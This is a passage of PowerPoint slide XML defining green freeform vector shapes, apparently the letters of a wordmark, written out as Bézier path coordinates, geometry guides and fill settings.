                <a:gd name="connsiteY12" fmla="*/ 83514 h 434554"/>
                <a:gd name="connsiteX13" fmla="*/ 276180 w 320053"/>
                <a:gd name="connsiteY13" fmla="*/ 38079 h 434554"/>
                <a:gd name="connsiteX14" fmla="*/ 211981 w 320053"/>
                <a:gd name="connsiteY14" fmla="*/ 185907 h 434554"/>
                <a:gd name="connsiteX15" fmla="*/ 163213 w 320053"/>
                <a:gd name="connsiteY15" fmla="*/ 203338 h 434554"/>
                <a:gd name="connsiteX16" fmla="*/ 88823 w 320053"/>
                <a:gd name="connsiteY16" fmla="*/ 203338 h 434554"/>
                <a:gd name="connsiteX17" fmla="*/ 88823 w 320053"/>
                <a:gd name="connsiteY17" fmla="*/ 78275 h 434554"/>
                <a:gd name="connsiteX18" fmla="*/ 163213 w 320053"/>
                <a:gd name="connsiteY18" fmla="*/ 78275 h 434554"/>
                <a:gd name="connsiteX19" fmla="*/ 211981 w 320053"/>
                <a:gd name="connsiteY19" fmla="*/ 95325 h 434554"/>
                <a:gd name="connsiteX20" fmla="*/ 229126 w 320053"/>
                <a:gd name="connsiteY20" fmla="*/ 140187 h 434554"/>
                <a:gd name="connsiteX21" fmla="*/ 211981 w 320053"/>
                <a:gd name="connsiteY21" fmla="*/ 185907 h 43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53" h="434554">
                  <a:moveTo>
                    <a:pt x="276180" y="38079"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="261777" y="25397"/>
                    <a:pt x="245009" y="15685"/>
                    <a:pt x="226840" y="9504"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206527" y="2860"/>
                    <a:pt x="185249" y="-359"/>
                    <a:pt x="163880" y="-21"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="-45" y="-21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="-45" y="434510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88823" y="434510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88823" y="281062"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163880" y="281062"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="185298" y="281328"/>
                    <a:pt x="206600" y="277880"/>
                    <a:pt x="226840" y="270870"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="245013" y="264698"/>
                    <a:pt x="261783" y="254986"/>
                    <a:pt x="276180" y="242295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="289930" y="229884"/>
                    <a:pt x="300929" y="214732"/>
                    <a:pt x="308469" y="197814"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="316343" y="179804"/>
                    <a:pt x="320272" y="160317"/>
                    <a:pt x="319995" y="140664"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="320208" y="121015"/>
                    <a:pt x="316281" y="101543"/>
                    <a:pt x="308469" y="83514"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="301147" y="66196"/>
                    <a:pt x="290126" y="50689"/>
                    <a:pt x="276180" y="38079"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="211981" y="185907"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="198826" y="198196"/>
                    <a:pt x="181177" y="204505"/>
                    <a:pt x="163213" y="203338"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="88823" y="203338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88823" y="78275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163213" y="78275"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="181114" y="77074"/>
                    <a:pt x="198728" y="83233"/>
                    <a:pt x="211981" y="95325"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="223624" y="107284"/>
                    <a:pt x="229825" y="123512"/>
                    <a:pt x="229126" y="140187"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229861" y="157124"/>
                    <a:pt x="223670" y="173630"/>
                    <a:pt x="211981" y="185907"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="00CE7C"/>
            </a:solid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4F6AB835-78E2-438E-80E8-2562948C7725}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4517230" y="3213616"/>
              <a:ext cx="365855" cy="434077"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 299611 w 365855"/>
                <a:gd name="connsiteY0" fmla="*/ 214386 h 434077"/>
                <a:gd name="connsiteX1" fmla="*/ 319995 w 365855"/>
                <a:gd name="connsiteY1" fmla="*/ 139710 h 434077"/>
                <a:gd name="connsiteX2" fmla="*/ 308469 w 365855"/>
                <a:gd name="connsiteY2" fmla="*/ 82560 h 434077"/>
                <a:gd name="connsiteX3" fmla="*/ 276180 w 365855"/>
                <a:gd name="connsiteY3" fmla="*/ 38078 h 434077"/>
                <a:gd name="connsiteX4" fmla="*/ 226840 w 365855"/>
                <a:gd name="connsiteY4" fmla="*/ 9503 h 434077"/>
                <a:gd name="connsiteX5" fmla="*/ 163975 w 365855"/>
                <a:gd name="connsiteY5" fmla="*/ -22 h 434077"/>
                <a:gd name="connsiteX6" fmla="*/ -45 w 365855"/>
                <a:gd name="connsiteY6" fmla="*/ -22 h 434077"/>
                <a:gd name="connsiteX7" fmla="*/ -45 w 365855"/>
                <a:gd name="connsiteY7" fmla="*/ 434033 h 434077"/>
                <a:gd name="connsiteX8" fmla="*/ 88823 w 365855"/>
                <a:gd name="connsiteY8" fmla="*/ 434033 h 434077"/>
                <a:gd name="connsiteX9" fmla="*/ 88823 w 365855"/>
                <a:gd name="connsiteY9" fmla="*/ 280585 h 434077"/>
                <a:gd name="connsiteX10" fmla="*/ 153402 w 365855"/>
                <a:gd name="connsiteY10" fmla="*/ 280585 h 434077"/>
                <a:gd name="connsiteX11" fmla="*/ 265702 w 365855"/>
                <a:gd name="connsiteY11" fmla="*/ 434033 h 434077"/>
                <a:gd name="connsiteX12" fmla="*/ 365810 w 365855"/>
                <a:gd name="connsiteY12" fmla="*/ 434033 h 434077"/>
                <a:gd name="connsiteX13" fmla="*/ 243318 w 365855"/>
                <a:gd name="connsiteY13" fmla="*/ 263535 h 434077"/>
                <a:gd name="connsiteX14" fmla="*/ 299611 w 365855"/>
                <a:gd name="connsiteY14" fmla="*/ 214386 h 434077"/>
                <a:gd name="connsiteX15" fmla="*/ 211981 w 365855"/>
                <a:gd name="connsiteY15" fmla="*/ 185144 h 434077"/>
                <a:gd name="connsiteX16" fmla="*/ 163308 w 365855"/>
                <a:gd name="connsiteY16" fmla="*/ 202194 h 434077"/>
                <a:gd name="connsiteX17" fmla="*/ 88823 w 365855"/>
                <a:gd name="connsiteY17" fmla="*/ 202194 h 434077"/>
                <a:gd name="connsiteX18" fmla="*/ 88823 w 365855"/>
                <a:gd name="connsiteY18" fmla="*/ 77798 h 434077"/>
                <a:gd name="connsiteX19" fmla="*/ 163308 w 365855"/>
                <a:gd name="connsiteY19" fmla="*/ 77798 h 434077"/>
                <a:gd name="connsiteX20" fmla="*/ 211981 w 365855"/>
                <a:gd name="connsiteY20" fmla="*/ 94847 h 434077"/>
                <a:gd name="connsiteX21" fmla="*/ 229126 w 365855"/>
                <a:gd name="connsiteY21" fmla="*/ 139710 h 434077"/>
                <a:gd name="connsiteX22" fmla="*/ 211981 w 365855"/>
                <a:gd name="connsiteY22" fmla="*/ 185144 h 43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5855" h="434077">
                  <a:moveTo>
                    <a:pt x="299611" y="214386"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="313527" y="192007"/>
                    <a:pt x="320614" y="166055"/>
                    <a:pt x="319995" y="139710"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="320204" y="120062"/>
                    <a:pt x="316280" y="100590"/>
                    <a:pt x="308469" y="82560"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="301116" y="65533"/>
                    <a:pt x="290096" y="50343"/>
                    <a:pt x="276180" y="38078"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="261778" y="25396"/>
                    <a:pt x="245004" y="15684"/>
                    <a:pt x="226840" y="9503"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206561" y="2865"/>
                    <a:pt x="185311" y="-353"/>
                    <a:pt x="163975" y="-22"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="-45" y="-22"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="-45" y="434033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88823" y="434033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88823" y="280585"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153402" y="280585"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="265702" y="434033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365810" y="434033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243318" y="263535"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="266369" y="252830"/>
                    <a:pt x="285895" y="235782"/>
                    <a:pt x="299611" y="214386"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="211981" y="185144"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="198760" y="197222"/>
                    <a:pt x="181177" y="203380"/>
                    <a:pt x="163308" y="202194"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="88823" y="202194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88823" y="77798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163308" y="77798"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="181168" y="76657"/>
                    <a:pt x="198732" y="82809"/>
                    <a:pt x="211981" y="94847"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="223621" y="106807"/>
                    <a:pt x="229822" y="123035"/>
                    <a:pt x="229126" y="139710"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229898" y="156567"/>
                    <a:pt x="223697" y="172997"/>
                    <a:pt x="211981" y="185144"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="00CE7C"/>
            </a:solid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B98E923C-3FAE-4F5E-B56C-D9DD04EABFBA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5020817" y="3213067"/>
              <a:ext cx="88868" cy="434721"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 88868"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 434721"/>
                <a:gd name="connsiteX1" fmla="*/ 88868 w 88868"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 434721"/>
                <a:gd name="connsiteX2" fmla="*/ 88868 w 88868"/>
                <a:gd name="connsiteY2" fmla="*/ 434721 h 434721"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 88868"/>
                <a:gd name="connsiteY3" fmla="*/ 434721 h 434721"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX3" y="connsiteY3"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="88868" h="434721">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="88868" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88868" y="434721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="434721"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="00CE7C"/>
            </a:solid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B6111A41-428A-4F41-AD69-526C31F69BA9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5296947" y="3205162"/>
              <a:ext cx="370141" cy="450532"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 281178 w 370141"/>
                <a:gd name="connsiteY0" fmla="*/ 267367 h 450532"/>
                <a:gd name="connsiteX1" fmla="*/ 29623 w 370141"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 450532"/>
                <a:gd name="connsiteX2" fmla="*/ 0 w 370141"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 450532"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 370141"/>
                <a:gd name="connsiteY3" fmla="*/ 442627 h 450532"/>
                <a:gd name="connsiteX4" fmla="*/ 88868 w 370141"/>
                <a:gd name="connsiteY4" fmla="*/ 442627 h 450532"/>
                <a:gd name="connsiteX5" fmla="*/ 88868 w 370141"/>
                <a:gd name="connsiteY5" fmla="*/ 181832 h 450532"/>
                <a:gd name="connsiteX6" fmla="*/ 341185 w 370141"/>
                <a:gd name="connsiteY6" fmla="*/ 450533 h 450532"/>
                <a:gd name="connsiteX7" fmla="*/ 370142 w 370141"/>
                <a:gd name="connsiteY7" fmla="*/ 450533 h 450532"/>
                <a:gd name="connsiteX8" fmla="*/ 370142 w 370141"/>
                <a:gd name="connsiteY8" fmla="*/ 7906 h 450532"/>
                <a:gd name="connsiteX9" fmla="*/ 281178 w 370141"/>
                <a:gd name="connsiteY9" fmla="*/ 7906 h 450532"/>
                <a:gd name="connsiteX10" fmla="*/ 281178 w 370141"/>
                <a:gd name="connsiteY10" fmla="*/ 267367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1" h="450532">
                  <a:moveTo>
                    <a:pt x="281178" y="267367"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="29623" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="442627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88868" y="442627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88868" y="181832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="341185" y="450533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370142" y="450533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370142" y="7906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281178" y="7906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281178" y="267367"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="00CE7C"/>
            </a:solidFill>
            <a:ln w="9525" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="fr-FR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Forme libre : forme 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45CB4264-87B9-4E50-AAB6-FF44CD9223A1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5812535" y="3213067"/>
              <a:ext cx="367474" cy="434721"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 367474"/>
                <a:gd name="connsiteY0" fmla="*/ 80391 h 434721"/>
                <a:gd name="connsiteX1" fmla="*/ 138970 w 367474"/>
                <a:gd name="connsiteY1" fmla="*/ 80391 h 434721"/>
                <a:gd name="connsiteX2" fmla="*/ 138970 w 367474"/>
                <a:gd name="connsiteY2" fmla="*/ 434721 h 434721"/>
                <a:gd name="connsiteX3" fmla="*/ 227838 w 367474"/>
                <a:gd name="connsiteY3" fmla="*/ 434721 h 434721"/>
                <a:gd name="connsiteX4" fmla="*/ 227838 w 367474"/>
                <a:gd name="connsiteY4" fmla="*/ 80391 h 434721"/>
                <a:gd name="connsiteX5" fmla="*/ 367475 w 367474"/>
                <a:gd name="connsiteY5" fmla="*/ 80391 h 434721"/>
                <a:gd name="connsiteX6" fmla="*/ 367475 w 367474"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 434721"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 367474"/>
                <a:gd name="connsiteY7" fmla="*/ 0 h 434721"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 367474"/>
                <a:gd name="connsiteY8" fmla="*/ 80391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74" h="434721">
                  <a:moveTo>
                    <a:pt x="0" y="80391"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="138970" y="80391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138970" y="434721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227838" y="434721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227838" y="80391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367475" y="80391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367475" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="80391"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="00CE7C"/>
            </a:solidFill>
            <a:ln w="9525" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="fr-FR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Forme libre : forme 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A54D529-4EA5-4C51-8107-266B9EA1414E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6324599" y="3213067"/>
              <a:ext cx="300323" cy="434721"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 88963 w 300323"/>
                <a:gd name="connsiteY0" fmla="*/ 244316 h 434721"/>
                <a:gd name="connsiteX1" fmla="*/ 239078 w 300323"/>
                <a:gd name="connsiteY1" fmla="*/ 244316 h 434721"/>
                <a:gd name="connsiteX2" fmla="*/ 239078 w 300323"/>
                <a:gd name="connsiteY2" fmla="*/ 168593 h 434721"/>
                <a:gd name="connsiteX3" fmla="*/ 88963 w 300323"/>
                <a:gd name="connsiteY3" fmla="*/ 168593 h 434721"/>
                <a:gd name="connsiteX4" fmla="*/ 88963 w 300323"/>
                <a:gd name="connsiteY4" fmla="*/ 80391 h 434721"/>
                <a:gd name="connsiteX5" fmla="*/ 292418 w 300323"/>
                <a:gd name="connsiteY5" fmla="*/ 80391 h 434721"/>
                <a:gd name="connsiteX6" fmla="*/ 292418 w 300323"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 434721"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 300323"/>
                <a:gd name="connsiteY7" fmla="*/ 0 h 434721"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 300323"/>
                <a:gd name="connsiteY8" fmla="*/ 434721 h 434721"/>
                <a:gd name="connsiteX9" fmla="*/ 300323 w 300323"/>
                <a:gd name="connsiteY9" fmla="*/ 434721 h 434721"/>
                <a:gd name="connsiteX10" fmla="*/ 300323 w 300323"/>
                <a:gd name="connsiteY10" fmla="*/ 354330 h 434721"/>
                <a:gd name="connsiteX11" fmla="*/ 88963 w 300323"/>
                <a:gd name="connsiteY11" fmla="*/ 354330 h 434721"/>
                <a:gd name="connsiteX12" fmla="*/ 88963 w 300323"/>
                <a:gd name="connsiteY12" fmla="*/ 244316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323" h="434721">
                  <a:moveTo>
                    <a:pt x="88963" y="244316"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="239078" y="244316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239078" y="168593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88963" y="168593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88963" y="80391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="292418" y="80391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="292418" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="434721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300323" y="434721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300323" y="354330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88963" y="354330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88963" y="244316"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="00CE7C"/>
            </a:solid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5769A95C-1A2B-4F3A-919D-061F0561707A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6789514" y="3205162"/>
              <a:ext cx="426053" cy="442626"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 212693 w 426053"/>
                <a:gd name="connsiteY0" fmla="*/ 235839 h 442626"/>
                <a:gd name="connsiteX1" fmla="*/ 29623 w 426053"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 442626"/>
                <a:gd name="connsiteX2" fmla="*/ 0 w 426053"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 442626"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 426053"/>
                <a:gd name="connsiteY3" fmla="*/ 442627 h 442626"/>
                <a:gd name="connsiteX4" fmla="*/ 88868 w 426053"/>
                <a:gd name="connsiteY4" fmla="*/ 442627 h 442626"/>
                <a:gd name="connsiteX5" fmla="*/ 88868 w 426053"/>
                <a:gd name="connsiteY5" fmla="*/ 210122 h 442626"/>
                <a:gd name="connsiteX6" fmla="*/ 198215 w 426053"/>
                <a:gd name="connsiteY6" fmla="*/ 347758 h 442626"/>
                <a:gd name="connsiteX7" fmla="*/ 227171 w 426053"/>
                <a:gd name="connsiteY7" fmla="*/ 347758 h 442626"/>
                <a:gd name="connsiteX8" fmla="*/ 337185 w 426053"/>
                <a:gd name="connsiteY8" fmla="*/ 210122 h 442626"/>
                <a:gd name="connsiteX9" fmla="*/ 337185 w 426053"/>
                <a:gd name="connsiteY9" fmla="*/ 442627 h 442626"/>
                <a:gd name="connsiteX10" fmla="*/ 426053 w 426053"/>
                <a:gd name="connsiteY10" fmla="*/ 442627 h 442626"/>
                <a:gd name="connsiteX11" fmla="*/ 426053 w 426053"/>
                <a:gd name="connsiteY11" fmla="*/ 0 h 442626"/>
                <a:gd name="connsiteX12" fmla="*/ 397097 w 426053"/>
                <a:gd name="connsiteY12" fmla="*/ 0 h 442626"/>
                <a:gd name="connsiteX13" fmla="*/ 212693 w 426053"/>
                <a:gd name="connsiteY13" fmla="*/ 235839 h 44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053" h="442626">
                  <a:moveTo>
                    <a:pt x="212693" y="235839"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="29623" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="442627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88868" y="442627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88868" y="210122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198215" y="347758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227171" y="347758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337185" y="210122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337185" y="442627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426053" y="442627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426053" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397097" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212693" y="235839"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="00CE7C"/>
            </a:solid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C8E29843-8EB3-4F47-9ACF-707321EE8483}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7391018" y="3213139"/>
              <a:ext cx="319788" cy="434553"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 308470 w 319788"/>
                <a:gd name="connsiteY0" fmla="*/ 82560 h 434553"/>
                <a:gd name="connsiteX1" fmla="*/ 276275 w 319788"/>
                <a:gd name="connsiteY1" fmla="*/ 38078 h 434553"/>
                <a:gd name="connsiteX2" fmla="*/ 226840 w 319788"/>
                <a:gd name="connsiteY2" fmla="*/ 9503 h 434553"/>
                <a:gd name="connsiteX3" fmla="*/ 163975 w 319788"/>
                <a:gd name="connsiteY3" fmla="*/ -22 h 434553"/>
                <a:gd name="connsiteX4" fmla="*/ -45 w 319788"/>
                <a:gd name="connsiteY4" fmla="*/ -22 h 434553"/>
                <a:gd name="connsiteX5" fmla="*/ -45 w 319788"/>
                <a:gd name="connsiteY5" fmla="*/ 434509 h 434553"/>
                <a:gd name="connsiteX6" fmla="*/ 88823 w 319788"/>
                <a:gd name="connsiteY6" fmla="*/ 434509 h 434553"/>
                <a:gd name="connsiteX7" fmla="*/ 88823 w 319788"/>
                <a:gd name="connsiteY7" fmla="*/ 281061 h 434553"/>
                <a:gd name="connsiteX8" fmla="*/ 163689 w 319788"/>
                <a:gd name="connsiteY8" fmla="*/ 281061 h 434553"/>
                <a:gd name="connsiteX9" fmla="*/ 226554 w 319788"/>
                <a:gd name="connsiteY9" fmla="*/ 270869 h 434553"/>
                <a:gd name="connsiteX10" fmla="*/ 275989 w 319788"/>
                <a:gd name="connsiteY10" fmla="*/ 242294 h 434553"/>
                <a:gd name="connsiteX11" fmla="*/ 308184 w 319788"/>
                <a:gd name="connsiteY11" fmla="*/ 197813 h 434553"/>
                <a:gd name="connsiteX12" fmla="*/ 319709 w 319788"/>
                <a:gd name="connsiteY12" fmla="*/ 140663 h 434553"/>
                <a:gd name="connsiteX13" fmla="*/ 308470 w 319788"/>
                <a:gd name="connsiteY13" fmla="*/ 82560 h 434553"/>
                <a:gd name="connsiteX14" fmla="*/ 211981 w 319788"/>
                <a:gd name="connsiteY14" fmla="*/ 185906 h 434553"/>
                <a:gd name="connsiteX15" fmla="*/ 163689 w 319788"/>
                <a:gd name="connsiteY15" fmla="*/ 203337 h 434553"/>
                <a:gd name="connsiteX16" fmla="*/ 89204 w 319788"/>
                <a:gd name="connsiteY16" fmla="*/ 203337 h 434553"/>
                <a:gd name="connsiteX17" fmla="*/ 89204 w 319788"/>
                <a:gd name="connsiteY17" fmla="*/ 78274 h 434553"/>
                <a:gd name="connsiteX18" fmla="*/ 163689 w 319788"/>
                <a:gd name="connsiteY18" fmla="*/ 78274 h 434553"/>
                <a:gd name="connsiteX19" fmla="*/ 212362 w 319788"/>
                <a:gd name="connsiteY19" fmla="*/ 95324 h 434553"/>
                <a:gd name="connsiteX20" fmla="*/ 229507 w 319788"/>
                <a:gd name="connsiteY20" fmla="*/ 140186 h 434553"/>
                <a:gd name="connsiteX21" fmla="*/ 211981 w 319788"/>
